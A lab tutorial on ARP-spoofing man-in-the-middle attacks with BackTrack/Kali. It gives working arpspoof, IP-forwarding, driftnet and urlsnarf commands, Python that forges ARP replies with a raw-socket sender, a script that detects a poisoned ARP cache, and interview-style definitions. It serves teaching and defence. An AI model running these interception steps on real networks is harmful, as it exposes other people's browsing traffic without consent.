Implementing a MITM attack with ARP spoofing using BackTrack 5 or Kali Linux
Tools description in brief:-
Nmap:- Used to discover the devices on the network and pick a Victim
Arpspoof:- Used twice, once for each direction of the traffic
1. To lie to the Gateway about the MAC address of the Victim
(the Gateway now maps the Victim's IP to BackTrack's MAC address)
2. To lie to the Victim about the MAC address of the Gateway
(the Victim now maps the Gateway's IP to BackTrack's MAC address)
Driftnet:- Displays the images the Victim downloads over plain HTTP
Urlsnarf:- Logs the URLs the Victim requests over plain HTTP (HTTPS requests are encrypted and do not appear in either tool)
Overview of the MITM Attack:-
After the attack:-
1. In XP's ARP cache the Gateway's IP is mapped to the MAC address of Backtrack5
2. In the Gateway's ARP cache XP's IP is mapped to the MAC address of Backtrack5
Both directions of the Victim's traffic therefore pass through Backtrack5, which forwards them on so the Victim notices nothing.
In XP Machine:-
Step1: To see the IP Address: ipconfig
Step2: To see the ARP cache: arp -a (note the Gateway's MAC address here; it is the value that changes after the attack)
Step3: To see the IP Address and MAC Address of XP itself: ipconfig /all
In Backtrack5 Machine:-
Nmap scan for choosing the Victim (a ping sweep of the local subnet with nmap -sn lists the live hosts, and when run as root their MAC addresses):
Step1: To get an IP Address from the DHCP Server: dhclient eth0
Step2: To see the IP Address & MAC Address: ifconfig eth0
Step3: To route the Victim's traffic through Backtrack we have to enable IP forwarding (without it the Victim's packets stop at Backtrack and the Victim simply loses connectivity, which gives the attack away):
echo 1 > /proc/sys/net/ipv4/ip_forward
Step4: To tell/lie to Victim XP that the Gateway is at Backtrack's MAC Address:
arpspoof -i eth0 -t <Victim IP> <Gateway IP>
(arpspoof stays in the foreground and re-sends the forged reply every couple of seconds, so run each arpspoof in its own terminal; Ctrl-C makes it restore the real entries before it exits)
Step5: Opening Wireshark to see the network traffic: wireshark
Step6: To tell/lie to the Gateway that Victim XP is at Backtrack's MAC Address:
arpspoof -i eth0 -t <Gateway IP> <Victim IP>
Step7: You can now see the spoofed ARP cache in Victim-XP (arp -a shows the Gateway's IP with Backtrack's MAC address)
Step8: To view the Victim's web surfing content in Backtrack5:
driftnet -i eth0 -> shows the images the user browses
urlsnarf -i eth0 -> shows the URLs visited by the Victim
Step9: Open a web browser in XP and go to some site, for example: www.google.com
(both tools only parse plain HTTP; a site served over HTTPS is relayed but stays encrypted, so its pages and images do not show up, only the connection itself in Wireshark)
Driftnet showing the images of victim’s browsing content in Backtrack5:
Urlsnarf showing the urls visited by victim in Backtrack5:
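The two arpspoof commands in Steps 4 and 6 each repeat a single forged ARP reply. The following is an added example, not code from the original tutorial or from dsniff, that builds those two replies byte for byte and decodes them, so you can see exactly what the Victim and the Gateway receive. The MAC and IP addresses are constructed lab values (assumptions); sending the frame needs Linux, root and a real interface and is left out of the default run.

```python
# Added example (not part of the original tutorial): build and decode the
# forged ARP replies that arpspoof sends in Steps 4 and 6.
import socket
import struct

ETH_P_ARP = 0x0806      # EtherType for ARP
ARP_REQUEST = 1
ARP_REPLY = 2

# Constructed lab addresses (assumptions, not from the tutorial)
ATTACKER_MAC = "00:0c:29:aa:bb:cc"                              # BackTrack
VICTIM_IP, VICTIM_MAC = "192.168.1.20", "00:0c:29:11:22:33"     # XP
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:50:56:c0:00:08"    # router


def mac_to_bytes(mac):
    """'aa:bb:cc:dd:ee:ff' or 'aa-bb-cc-dd-ee-ff' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def bytes_to_mac(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II header + 28-byte ARP body = 42 bytes (no padding)."""
    eth = struct.pack("!6s6sH", mac_to_bytes(target_mac),
                      mac_to_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1,            # hardware type: Ethernet
                      0x0800,       # protocol type: IPv4
                      6, 4,         # hardware / protocol address lengths
                      opcode,
                      mac_to_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_to_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode a frame from build_arp (or one captured with Wireshark)."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError("not an ARP frame: ethertype 0x%04x" % ethertype)
    (htype, ptype, hlen, plen, opcode,
     sha, spa, tha, tpa) = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {
        "eth_dst": bytes_to_mac(dst), "eth_src": bytes_to_mac(src),
        "opcode": opcode,
        "sender_mac": bytes_to_mac(sha), "sender_ip": socket.inet_ntoa(spa),
        "target_mac": bytes_to_mac(tha), "target_ip": socket.inet_ntoa(tpa),
    }


def poison_frames(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The two replies arpspoof keeps re-sending.

    to_victim  is 'arpspoof -t VICTIM GATEWAY': "GATEWAY_IP is at ATTACKER_MAC"
    to_gateway is 'arpspoof -t GATEWAY VICTIM': "VICTIM_IP is at ATTACKER_MAC"
    The sender MAC in both is the attacker's, so each side overwrites its cache
    entry for the other host with BackTrack's MAC.
    """
    to_victim = build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def send_frame(iface, frame):
    """Put a raw frame on the wire. Linux only, needs root. Not run by default."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        return s.send(frame)


if __name__ == "__main__":
    frames = poison_frames(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)
    for name, frame in zip(("to victim", "to gateway"), frames):
        print(name, len(frame), "bytes:", parse_arp(frame))
```

Note that arpspoof first has to learn the real MAC of each target with a normal ARP request; here those MACs are simply supplied as constants. Capturing the lab traffic in Wireshark (Step 5) and filtering on arp.opcode == 2 shows frames with exactly these fields.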
Possible Interview Questions:-
What is Man In The Middle Attack?
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
What is ARP?
The Address Resolution Protocol (ARP) is a widely used protocol for resolving network layer addresses into link layer addresses.
When an Internet Protocol (IP) datagram is sent from one host to another on a local area network, the destination IP address must be converted into a MAC address for transmission via the data link layer. When another host’s IP address is known, and its MAC address is needed, a broadcast packet is sent out on the local network. This packet is known as an ARP request. The destination machine with the IP in the ARP request then responds with an ARP reply, which contains the MAC address for that IP.
ARP is a stateless protocol. In the classic description, network hosts cache any ARP reply they receive, regardless of whether or not they requested it, and even ARP entries which have not yet expired are overwritten when a new ARP reply arrives. Many modern stacks are stricter and ignore unsolicited replies for IP addresses that are not already in the cache, but an existing entry (such as the Gateway's) is still updated, which is why the attack above works and why arpspoof keeps re-sending its reply every few seconds rather than sending it once.
What is ARP Spoofing?
ARP spoofing is a technique whereby an attacker sends fake (“spoofed”) Address Resolution Protocol (ARP) messages onto a Local Area Network. Generally, the aim is to associate the attacker’s MAC address with the IP address of another host (such as the default gateway), causing any traffic meant for that IP address to be sent to the attacker instead.
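Step 7 above says the spoofed cache is visible in the Victim's arp -a; the following is an added example, not part of the original tutorial, that turns that observation into a check. It parses arp -a output (Windows dash-separated or Linux/BSD colon-separated MACs), flags any MAC address that claims more than one IP, and compares the Gateway's entry with the MAC recorded in Step 2 before the attack. The arp -a text and the addresses are constructed (assumptions).

```python
# Added example (not part of the original tutorial): detect the poisoned
# ARP cache from 'arp -a' output.
import re

# Constructed Windows XP 'arp -a' output after Steps 4 and 6 (assumption):
# BackTrack's MAC now claims both the Gateway and a second host.
ARP_A_AFTER = """\
Interface: 192.168.1.20 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-0c-29-aa-bb-cc     dynamic
  192.168.1.10          00-0c-29-aa-bb-cc     dynamic
  192.168.1.254         00-11-22-33-44-55     dynamic
"""

# The Gateway's MAC as noted in Step 2, before the attack (assumption)
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC_BEFORE = "00:50:56:c0:00:08"

# One entry per line: an IPv4 address followed, somewhere later, by a MAC.
# Matches '192.168.1.1  00-0c-29-...' (Windows) and
# '? (192.168.1.1) at 00:50:56:... [ether] on eth0' (Linux/BSD).
# Header lines and '(incomplete)' entries have no MAC and are skipped.
ENTRY = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3}).*?([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})")


def norm_mac(mac):
    """Compare MACs in one spelling: lowercase, colon-separated."""
    return mac.lower().replace("-", ":")


def parse_arp_table(text):
    """Return {ip: mac} from 'arp -a' output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.search(line)
        if m:
            table[m.group(1)] = norm_mac(m.group(2))
    return table


def shared_macs(table):
    """MACs that appear for more than one IP: the classic poisoning symptom.

    A router that legitimately owns several IPs also shows up here, so treat
    a hit as something to investigate, not proof on its own.
    """
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_changed(table, gateway_ip, expected_mac):
    """True if the Gateway entry no longer matches the MAC recorded earlier."""
    return table.get(gateway_ip) != norm_mac(expected_mac)


def check(text, gateway_ip, expected_mac):
    """Human-readable findings for one 'arp -a' dump; empty list means clean."""
    table = parse_arp_table(text)
    findings = []
    for mac, ips in shared_macs(table).items():
        findings.append("MAC %s claims %s" % (mac, ", ".join(ips)))
    if gateway_changed(table, gateway_ip, expected_mac):
        findings.append("gateway %s moved from %s to %s" % (
            gateway_ip, norm_mac(expected_mac), table.get(gateway_ip)))
    return findings


if __name__ == "__main__":
    for finding in check(ARP_A_AFTER, GATEWAY_IP, GATEWAY_MAC_BEFORE):
        print("ALERT:", finding)
```

Run against the Victim's output before Step 4 the check returns nothing; run after Step 6 it reports both the duplicate MAC and the changed Gateway entry. The "before" comparison is the more reliable of the two, which is why Step 2 asks you to record the Gateway's MAC first; in production the same idea is what a static ARP entry for the gateway, or a tool such as arpwatch, enforces continuously.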